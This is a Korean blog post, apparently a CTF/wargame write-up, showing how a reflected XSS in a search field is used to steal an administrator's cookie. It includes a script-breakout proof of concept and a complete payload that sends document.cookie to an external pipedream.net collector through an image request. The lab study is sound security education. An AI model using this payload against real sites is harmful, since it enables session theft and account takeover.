목표: 관리자의 쿠키를 탈취하라!
우선 글쓰기 게시판 입니다.
글을 쓰기전 일단 입력이 되는 부분을 체크하고 가겠습니다.
Search 창에 "Fubao" 라고 적어준뒤 알림창이 뜨는 양상을 보겠습니다.
저희가 적어준 값이 페이지에 표시되는것을 볼수 있습니다.
그러면 저희는 이렇게 생각해 볼수 있겠죠.
1. "이 부분을 Refelcted XSS 공격에 사용할 수 있을까?"
2. "그러면 우선 Get 방식으로 파라미터가 전달되는지 확인해봐야겠다"
그리하여 Burp suite 로 방금보낸 요청을 살펴보도록 하죠.
보시면 Fubao 라는 값을 POST 방식으로 보내주고 , 그 값이 응답에 alert 를 사용해서 띄워지고 있습니다.
여기서 제가 확인하고 싶은것은
'변수들을 GET 방식으로 바꿔 보내도 같은 응답이 오느냐.' 입니다.
만약 가능하다면 입력값에 ') alert(1); // 을 삽입하여 POC 코드를 실행해볼수 있겠죠.
그리고 된다면 이는 Reflected XSS 로 이어질수 있습니다.
GET 방식으로 변수값을 보내도 동일한 응답을 받는것을 확인하였습니다.
이제 POC 코드를 체크해보겠습니다.
스크립트 코드 안에서 POC 코드인 alert(1); 이 유효하게 동작하는것을 확인하였습니다.
이제 alert(1) 대신 cookie 탈취 코드를 입력해주겠습니다.
입력값 >> ');var%20data=document.cookie;var%20i=new%20Image();i.src='https://encxlimxsq6z.x.pipedream.net?cookie='%2Bdata;
제가 설정해둔 사이트로 Image 파일 요청을 보내면서 동시에 쿠키값을 전달하는것을 확인하실수 있습니다.
이제 이 GET 방식의 링크를 관리자의 컴퓨터로 접속하게 해보도록 하겠습니다.
무사히 플래그 값을 얻을수 있었다.
긴 글 읽어주셔서 감사합니다!
'워게임 문제풀이 > Segfault' 카테고리의 다른 글
<Segfault> 워게임 문제풀이 [XSS 4] (0) | 2024.07.01 |
---|---|
<Segfault> 워게임 문제풀이 [XSS 3] (0) | 2024.07.01 |
<Segfault> 워게임 문제풀이 [XSS 1] (0) | 2024.06.26 |
<Segfault> 워게임 문제풀이 [7편]-Blind SQL Injection (0) | 2024.05.31 |
<Segfault> 워게임 문제풀이[6편] - SQL Injection3 (1) | 2024.05.31 |